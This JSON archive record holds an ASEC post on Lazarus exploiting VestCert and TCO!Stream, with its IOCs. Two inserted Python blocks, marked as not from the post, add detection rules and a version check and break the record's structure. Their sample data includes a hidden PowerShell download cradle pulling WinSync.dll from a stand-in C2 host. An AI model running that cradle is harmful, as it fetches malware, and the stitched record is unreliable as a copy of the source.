{
	"id": "c4123247-f2fa-4f6c-ac6e-b577554e12c4",
	"created_at": "2026-04-06T00:10:37.515987Z",
	"updated_at": "2026-04-10T03:21:59.154067Z",
	"deleted_at": null,
	"sha1_hash": "4a4a626b89eb42ac370a6845370ff86301d9bfa8",
	"title": "Lazarus Threat Group Exploiting Vulnerability of Korean Finance Security Solution - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1586443,
	"plain_text": "Lazarus Threat Group Exploiting Vulnerability of Korean Finance\r\nSecurity Solution - ASEC\r\nBy ATCP\r\nPublished: 2023-06-07 · Archived: 2026-04-05 15:58:06 UTC\r\nAs covered before here on the ASEC Blog, the Lazarus threat group exploits the vulnerabilities of INISAFE\r\nCrossWeb EX and MagicLine4NX in their attacks. \r\nNew Malware of Lazarus Threat Actor Group Exploiting INITECH Process (Apr 26, 2022)\r\nA Case of Malware Infection by the Lazarus Attack Group Disabling Anti-Malware Programs With the\r\nBYOVD Technique (Oct 31, 2022)\r\nWhile monitoring the activities of the Lazarus threat group, AhnLab Security Emergency response Center (ASEC)\r\nrecently discovered that the zero-day vulnerability of VestCert and TCO!Stream are also being exploited in\r\naddition to the previously targeted INISAFE CrossWeb EX and MagicLine4NX. VestCert is a web security\r\nsoftware developed by Yettiesoft using a non-ActiveX approach, while TCO!Stream is a company asset\r\nmanagement program made by MLsoft. Both solutions are widely used by Korean companies. Since Lazarus\r\nactively seeks out and exploits new vulnerabilities in software used in Korea, it is highly recommended that\r\nbusinesses utilizing these software solutions promptly update to the latest versions. Malware Download via\r\nVestCert Vulnerability The threat group utilizes the watering hole method when carrying out their initial breach\r\nof companies. When users with vulnerable versions of VestCert installed on their Windows systems visit a specific\r\nhttps://asec.ahnlab.com/en/54195/\r\nPage 1 of 5\n\nwebsite that has been injected with a malicious script, then, regardless of their web browser type, PowerShell is\r\nexecuted due to a third-party library execution vulnerability in the VestCert software. As shown below,\r\nPowerShell then connects to a C2 server to download and execute malware. \r\nFigure. 
PowerShell command to download malware (WinSync.dll), executed via the VestCert vulnerability\r\nInternal Propagation of Malware via TCO!Stream Vulnerability\r\nThe threat group uses the TCO!Stream vulnerability to propagate the malware from the initially compromised system to other internal systems. TCO!Stream consists of a server and a client; the server offers features such as software distribution to clients and remote control. To communicate with the server, the client always listens on TCP port 3511. Using malware of their own development, the threat group generates command packets and sends them to the client. These command packets instruct the client to download and execute a specific file from the server. Upon receiving such a command, the client connects to the TCO!Stream server and downloads and executes the malicious file that the threat group has prepared in advance. The malware created by the threat group is executed with a command line whose parameters have the following meaning.\r\n\u003cMalware\u003e: Name of the malicious file (MicrosoftVSA.bin, MicroForic.tlb, matrox86.bic, matrox86.tcm, wincert.bin, mseng.bin)\r\n\u003cTCO DeviceID\u003e: Device ID of the TCO server\r\n\u003cDestination IP\u003e: System IP of the target client\r\n\u003cDestination Port\u003e: Port of the target client system (3511)\r\n\u003cJob ID\u003e: Job ID used in the server\r\nFigure. Parts of the decrypted command data (for analysis)\r\nLocation of the distributed file: C:\\Packages\\\u003cDistribution module name\u003e\\\u003cVersion\u003e\\\u003cFinal path\u003e\\\u003cName of distributed file\u003e\r\nRun command: loadconf.exe –rt5y65i8##7poi88++5t4t54t54t5n\r\nThe above command downloads loadconf.exe, a backdoor downloader, to C:\\Temp\\ and executes it with an argument. 
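The initial-access and propagation behaviour described above, expressed as detection rules and run over constructed telemetry. This is an added example and not code from the ASEC post; the telemetry field names, the TCO!Stream server address 10.0.0.5, the VestCert host process name vestcert.exe and the TCO!Stream client process name tco_agent.exe are assumptions made here for illustration, as is the C2 URL in the sample command line.

```python
# Added example (not code from the ASEC post): detection logic for the two
# techniques described above, run over a constructed sample of endpoint and
# network telemetry. Assumptions that are NOT in the post: the telemetry field
# names, the TCO!Stream server address 10.0.0.5, the VestCert host process
# name vestcert.exe and the TCO!Stream client process name tco_agent.exe.
import ntpath
import re

TCO_SERVER_IP = '10.0.0.5'   # constructed: the legitimate TCO!Stream server
TCO_CLIENT_PORT = 3511        # from the post: the client always listens here
# Names the post lists for files distributed through TCO!Stream, plus the
# VestCert-stage DLL (WinSync.dll) and the second-stage downloader.
KNOWN_BAD_NAMES = {
    'microsoftvsa.bin', 'microforic.tlb', 'matrox86.bic', 'matrox86.tcm',
    'wincert.bin', 'mseng.bin', 'loadconf.exe', 'winsync.dll',
}
BROWSERS = {'chrome.exe', 'msedge.exe', 'iexplore.exe', 'firefox.exe', 'whale.exe'}
# Common PowerShell download cradles. The post only says PowerShell fetches the
# DLL from C2, so the exact command line is unknown and this is deliberately broad.
CRADLE = re.compile(
    'downloadfile|downloadstring|invoke-webrequest|start-bitstransfer|'
    'net.webclient|iwr ', re.IGNORECASE)


def path_parts(path):
    # Lower-cased Windows path split into its components (works on any OS).
    return ntpath.normcase(path).split(ntpath.sep)


def check_process(ev):
    parts = path_parts(ev['image'])
    child = parts[-1]
    parent = path_parts(ev['parent_image'])[-1]
    # Rule 1: PowerShell with a download cradle spawned under a browser or the
    # assumed VestCert process. The post says the cradle fires regardless of
    # browser, so the rule keys on the child and accepts any browser parent.
    if (child == 'powershell.exe' and CRADLE.search(ev['cmdline'])
            and (parent in BROWSERS or parent == 'vestcert.exe')):
        return 'vestcert_download_cradle'
    # Rule 2: the loadconf.exe backdoor downloader run from C:\Temp\ (per the post).
    if child == 'loadconf.exe' and parts[:2] == ['c:', 'temp']:
        return 'loadconf_from_temp'
    return None


def check_file(ev):
    # Rule 3: a known payload name written under the TCO!Stream distribution
    # root C:\Packages\<module>\<version>\... (path layout taken from the post).
    parts = path_parts(ev['target'])
    if parts[:2] == ['c:', 'packages'] and len(parts) >= 5 and parts[-1] in KNOWN_BAD_NAMES:
        return 'tco_distributed_payload'
    return None


def check_network(ev):
    # Rule 4: a connection to a client's TCP 3511 from anything other than the
    # TCO!Stream server means some other host is issuing TCO commands, which is
    # exactly the internal-propagation path the post describes.
    if ev['dst_port'] == TCO_CLIENT_PORT and ev['src_ip'] != TCO_SERVER_IP:
        return 'tco_command_from_non_server'
    return None


def scan(events):
    # Returns (host, rule) for every event that trips a rule, in input order.
    checks = {'process': check_process, 'file': check_file, 'network': check_network}
    hits = []
    for ev in events:
        rule = checks[ev['type']](ev)
        if rule:
            hits.append((ev['host'], rule))
    return hits


PS = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
# Constructed telemetry: pc-01 is the watering-hole victim, pc-02 the TCO!Stream
# target reached from 10.0.0.23, pc-03 shows benign traffic from the real server.
SAMPLE_EVENTS = [
    {'type': 'process', 'host': 'pc-01', 'image': PS,
     'parent_image': 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe',
     'cmdline': 'powershell -ep bypass -w hidden -c (New-Object Net.WebClient).DownloadFile(http://c2.example/WinSync.dll, C:\\Temp\\WinSync.dll)'},
    {'type': 'network', 'host': 'pc-02', 'src_ip': '10.0.0.23', 'dst_ip': '10.0.0.42', 'dst_port': 3511},
    {'type': 'file', 'host': 'pc-02', 'target': 'C:\\Packages\\SWDist\\2.0.1\\Release\\wincert.bin'},
    {'type': 'process', 'host': 'pc-02', 'image': 'C:\\Temp\\loadconf.exe',
     'parent_image': 'C:\\Program Files\\TCO\\tco_agent.exe',
     'cmdline': 'loadconf.exe –rt5y65i8##7poi88++5t4t54t54t5n'},
    {'type': 'network', 'host': 'pc-03', 'src_ip': '10.0.0.5', 'dst_ip': '10.0.0.43', 'dst_port': 3511},
    {'type': 'process', 'host': 'pc-03', 'image': PS,
     'parent_image': 'C:\\Windows\\explorer.exe', 'cmdline': 'powershell -c Get-Date'},
]

if __name__ == '__main__':
    for host, rule in scan(SAMPLE_EVENTS):
        print(host, rule)
```

Rule 4 is the one worth deploying first: legitimate TCO!Stream command traffic should originate only from the server, so any other source talking to a client on 3511 is a direct signal of the lateral movement described above, independent of which payload name the group uses next.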
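As a further added example (again not code from the ASEC post), a check of an installed-version inventory against the affected and resolved versions that the Vulnerability Information section below gives for VestCert and TCO!Stream. The inventory format (host, product, version) is an assumption made here; the version boundaries are the ones stated in the post.

```python
# Added example (not code from the ASEC post): flag hosts whose installed
# VestCert or TCO!Stream version falls in the affected range. The inventory
# format (host, product, version) is assumed; the version boundaries are the
# ones the post reports. Vendor version strings here are purely numeric.
AFFECTED = {
    # product: (lowest affected, highest affected, first fixed)
    'VestCert': ('2.3.6', '2.5.29', '2.5.30'),            # 2.3.6 ~ 2.5.29 affected
    'TCO!Stream': (None, '8.0.22.1115', '8.0.23.215'),    # 8.0.22.1115 and below affected
}


def vtuple(version):
    # Compare numerically so that 2.5.30 > 2.5.4 (string comparison gets this wrong)
    # and 8.0.22.1115 > 8.0.22 (a shorter tuple sorts before its longer extension).
    return tuple(int(p) for p in version.strip().split('.'))


def assess(product, version):
    low, high, fixed = AFFECTED[product]
    v = vtuple(version)
    if v >= vtuple(fixed):
        return 'patched'
    if low is not None and v < vtuple(low):
        # Older than the range the advisory lists: not stated as affected,
        # but not stated as safe either.
        return 'older than affected range, verify with vendor'
    if v <= vtuple(high):
        return 'vulnerable'
    # A build newer than the last listed affected version but below the fix is
    # not declared fixed by the vendor, so treat it as vulnerable.
    return 'vulnerable (between affected range and fix)'


def find_vulnerable(inventory):
    # inventory: iterable of (host, product, version); returns everything not patched.
    report = []
    for host, product, version in inventory:
        if product not in AFFECTED:
            continue
        status = assess(product, version)
        if status != 'patched':
            report.append((host, product, version, status))
    return report


SAMPLE_INVENTORY = [  # constructed inventory for illustration
    ('fin-ws-01', 'VestCert', '2.5.29'),
    ('fin-ws-02', 'VestCert', '2.5.30'),
    ('fin-ws-03', 'VestCert', '2.3.5'),
    ('fin-ws-04', 'VestCert', '2.5.4'),
    ('srv-tco-01', 'TCO!Stream', '8.0.23.215'),
    ('fin-ws-05', 'TCO!Stream', '8.0.22.1115'),
    ('fin-ws-06', 'TCO!Stream', '8.0.22.2000'),
    ('fin-ws-07', 'TCO!Stream', '7.9.0.100'),
]

if __name__ == '__main__':
    for row in find_vulnerable(SAMPLE_INVENTORY):
        print(*row)
```

Because neither product updates itself, the check has to run against what is actually installed on each host rather than against what the vendor currently ships; the post also recommends uninstalling the old version before installing the patched one.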
Vulnerability Information\r\nASEC analyzed the VestCert and TCO!Stream vulnerabilities exploited in this case and reported them to the Korea Internet \u0026 Security Agency (KISA). The information was also given to the respective vendors, and the vulnerabilities in question have been patched. On March 13, a security advisory titled “Update Recommendation for Finance Security Solutions” was posted on KISA’s vulnerability information portal (https://knvd.krcert.or.kr/detailSecNo.do?IDX=5881). However, the software in question does not update automatically, so many sites are still running vulnerable versions. It is advised to manually uninstall the software before reinstalling the patched version. The VestCert and TCO!Stream vulnerabilities have been covered before on the ASEC Blog; the affected and resolved versions of each product are as follows.\r\nVestCert\r\nVulnerability information: Warning for Certification Solution (VestCert) Vulnerability and Update Recommendation (Mar 23, 2023)\r\nAffected versions: 2.3.6 ~ 2.5.29\r\nResolved version: 2.5.30\r\nTCO!Stream\r\nVulnerability information: Warning for Asset Management Program (TCO!Stream) Vulnerability and Update Recommendation (Mar 23, 2023)\r\nAffected versions: 8.0.22.1115 and below\r\nResolved version: 8.0.23.215\r\nAhnLab detects and blocks the malware, malicious behavior, and URLs using the following aliases. 
[File Detection]\r\nTrojan/Win.Lazardoor (2023.01.11.03)\r\nData/BIN.EncodedPE (2023.01.12.00)\r\nTrojan/Win.Lazardoor (2022.01.05.01)\r\nTrojan/Win.Agent (2023.01.12.03)\r\nTrojan/Win.LazarLoader (2023.01.21.00)\r\n[Behavior Detection]\r\nInitialAccess/EDR.Lazarus.M10963\r\nExecution/EDR.Event.M10769\r\nInjection/EDR.Lazarus.M10965\r\nFileless/EDR.Event.M11080\r\nMD5\r\n064d696a93a3790bd3a1b8b76baaeef3\r\n55f0225d58585d60d486a3cc7eb93de5\r\n67d306c163b38a06e98da5711e14c5a7\r\n747177aad5aef020b82c6aeabe5b174f\r\n8adeeb291b48c97db1816777432d97fd\r\nSHA1\r\n3ca6abf845f3528edf58418e5e42a9c1788efe7a\r\nec5d5941522d947abd6c9e82e615b46628a2155f\r\nURL\r\nhttp[:]//ksmarathon[.]com/admin/excel2[.]asp\r\nhttp[:]//www[.]sinae[.]or[.]kr/sub01/index[.]asp\r\nhttps[:]//swt-keystonevalve[.]com/data/content/cache/cache[.]php?mode=read\r\nhttps[:]//www[.]bcdm[.]or[.]kr/board/type3_D/edit[.]asp\r\nhttps[:]//www[.]coupontreezero[.]com/include/bottom[.]asp\r\nAdditional IOCs are available on AhnLab TIP.\r\nSource: https://asec.ahnlab.com/en/54195/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://asec.ahnlab.com/en/54195/"
	],
	"report_names": [
		"54195"
	],
	"threat_actors": [],
	"ts_created_at": 1775434237,
	"ts_updated_at": 1775791319,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4a4a626b89eb42ac370a6845370ff86301d9bfa8.pdf",
		"text": "https://archive.orkl.eu/4a4a626b89eb42ac370a6845370ff86301d9bfa8.txt",
		"img": "https://archive.orkl.eu/4a4a626b89eb42ac370a6845370ff86301d9bfa8.jpg"
	}
}